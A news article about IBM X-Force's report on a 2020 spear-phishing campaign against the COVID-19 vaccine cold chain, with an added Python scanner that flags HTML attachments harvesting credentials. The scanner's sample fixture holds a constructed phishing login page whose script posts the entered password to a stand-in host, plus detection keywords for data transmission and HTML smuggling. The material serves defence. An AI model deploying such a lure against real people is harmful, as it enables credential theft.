A global phishing campaign has targeted organizations associated with a segment of the COVID-19 supply chain in an apparent nation-state effort, IBM researchers found.
IBM’s Security X-Force said the calculated operation started in September 2020 and targeted businesses across six countries associated with the COVID-19 cold chain, the part of the supply chain that keeps vaccines in temperature-controlled environments during storage and transportation. The adversary impersonated an executive from Haier Biomedical, a Chinese company that is reportedly the world’s only complete cold chain provider.
“The purpose of this COVID-19 phishing campaign may have been to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution,” Claire Zaboeva, senior strategic cyber threat analyst at IBM, wrote in a blog post Thursday.
The targets included the European Commission’s Directorate-General for Taxation and Customs Union, as well as private companies headquartered in Germany, Italy, South Korea, the Czech Republic, greater Europe and Taiwan. Firms in the energy, manufacturing, website creation, and software and internet security sectors that serve the transportation needs of the COVID-19 cold chain were targeted.
Spear-phishing emails were sent to select executives in sales, procurement, information technology and finance positions who were believed to be involved in company efforts to support the vaccine cold chain. It’s unclear from IBM’s analysis if the COVID-19 phishing campaign was ultimately successful, according to Zaboeva.
The subject lines of the phishing emails posed as requests for quotation, and the emails carried malicious HTML attachments. When opened, an attachment rendered a login page locally in the recipient’s browser and prompted them to enter their credentials to view the file. Because the page is rendered from the attachment rather than served from a web host, the attackers did not have to stand up phishing sites online that security research teams and law enforcement could discover and take down.
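A locally rendered HTML lure leaves one tell that a mail gateway can check without any live site to visit: a file opened from disk renders under file://, so a relative form action goes nowhere, and a working harvest page must name an absolute destination, either in the form’s action attribute or in script that submits the fields. The following is an added example, not code from IBM’s report or the campaign’s own kit: it extracts HTML attachments from a raw message and flags those that pair a password field with an absolute external post target. The message, the lure markup and the hostname `docs-view.example-invalid.test` are constructed for the example; the real attachment’s markup is not published on this page. The `atob`/`Blob` check goes beyond what the article describes and covers the related HTML-smuggling pattern in which the attachment decodes an embedded payload.

```python
"""Gateway-side triage of HTML attachments that render a credential prompt locally.

Added example; sample message, markup and hostnames are constructed, not campaign artifacts.
"""
import base64
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class _FormScanner(HTMLParser):
    """Collect password inputs, form actions and inline script text from an HTML document."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands <script> bodies to handle_data as raw text
            self.scripts.append(data)


def analyze_html_attachment(html, trusted_hosts=()):
    """Return a verdict and the indicators behind it for one HTML document."""
    p = _FormScanner()
    p.feed(html)
    findings = []
    if p.password_inputs:
        findings.append("password_field")
    # Absolute destinations: explicit form actions plus any URL inside inline script.
    dests = [u for u in p.form_actions if u]
    for s in p.scripts:
        dests.extend(URL_RE.findall(s))
    external = sorted({h for h in (urlparse(u).hostname for u in dests) if h and h not in trusted_hosts})
    if external:
        findings.append("posts_to_external_host")
    if any(k in s for s in p.scripts for k in ("fetch(", "XMLHttpRequest", "navigator.sendBeacon")):
        findings.append("script_transmits_data")
    if any(k in s for s in p.scripts for k in ("atob(", "new Blob(")):
        findings.append("decodes_embedded_payload")  # HTML-smuggling tell, broader than this campaign
    if "password_field" in findings and "posts_to_external_host" in findings:
        verdict = "credential_harvest"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "findings": findings, "external_hosts": external}


def scan_message(raw_eml, trusted_hosts=()):
    """Run analyze_html_attachment over every HTML attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            body = part.get_content()  # decodes the transfer encoding for us
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            results.append((name, analyze_html_attachment(body, trusted_hosts)))
    return results


# Constructed lure: asks for corporate credentials to "view" an RFQ and posts them off-host.
SAMPLE_PHISH_HTML = """<html><head><title>Protected document</title></head><body>
<p>This RFQ is protected. Sign in with your corporate e-mail account to view it.</p>
<form id="f" method="post" action="https://docs-view.example-invalid.test/auth.php">
  <input type="email" name="user" placeholder="E-mail">
  <input type="password" name="pass" placeholder="Password">
  <button type="submit">View document</button>
</form>
<script>
document.getElementById('f').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('https://docs-view.example-invalid.test/collect', {method: 'POST', body: new FormData(e.target)});
});
</script></body></html>"""

SAMPLE_BENIGN_HTML = "<html><body><h1>Q3 cold chain capacity report</h1><p>No action required.</p></body></html>"

# Constructed message carrying the lure as a base64-encoded HTML attachment.
SAMPLE_EML = (
    "From: sales@vendor.example\r\nTo: procurement@target.example\r\n"
    "Subject: Request for Quotation - temperature-controlled transport\r\n"
    "MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary=\"b1\"\r\n\r\n"
    "--b1\r\nContent-Type: text/plain\r\n\r\nPlease find the RFQ attached.\r\n"
    "--b1\r\nContent-Type: text/html; name=\"RFQ.html\"\r\n"
    "Content-Disposition: attachment; filename=\"RFQ.html\"\r\n"
    "Content-Transfer-Encoding: base64\r\n\r\n"
    + base64.encodebytes(SAMPLE_PHISH_HTML.encode()).decode() + "--b1--\r\n"
).encode()

if __name__ == "__main__":
    for name, result in scan_message(SAMPLE_EML):
        print(name, result)
```

Pass the organization’s own login hosts in `trusted_hosts` so a legitimately protected document that posts to the corporate identity provider drops to `suspicious` rather than `credential_harvest`; a password field in an attachment is still worth a look even when its destination is trusted, since the same file could carry a second, obfuscated destination the regex does not see.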
“The adversary could gain insight into internal communications, as well as the process, methods and plans to distribute a COVID-19 vaccine,” Zaboeva wrote in the blog post. “This includes information regarding infrastructure that governments intend to use to distribute a vaccine to the vendors that will be supplying it.”
From a targeting perspective, IBM said going after the Directorate-General could serve as a single point of compromise impacting multiple high-value targets across the 27 member states of the European Union and beyond. Adversaries also targeted a German website development company that supports multiple clients associated with pharmaceutical manufacturers, container transport and biotechnology.
Within the energy sector, IBM said companies that manufacture solar panels were targeted because vaccines can be kept cold in countries without reliable power by using solar-powered refrigerators. Companies associated with petrochemicals were also targeted because dry ice, solid carbon dioxide commonly made from CO2 captured as a byproduct of petroleum refining and other industrial processes, is a key component of the cold chain.
The precise targeting and the nature of the organizations the adversaries went after point to nation-state activity, IBM said, while acknowledging that insight into the transport of a vaccine might also fetch a price on the black market.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” Zaboeva wrote. “Advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
IBM recommends that firms likely to be targeted as part of the COVID-19 supply chain: create and test their incident response plans; share and ingest threat intelligence; assess their third-party ecosystem; apply a zero-trust approach to their security strategy; use multi-factor authentication across the organization; conduct email security awareness training; and deploy endpoint detection and response.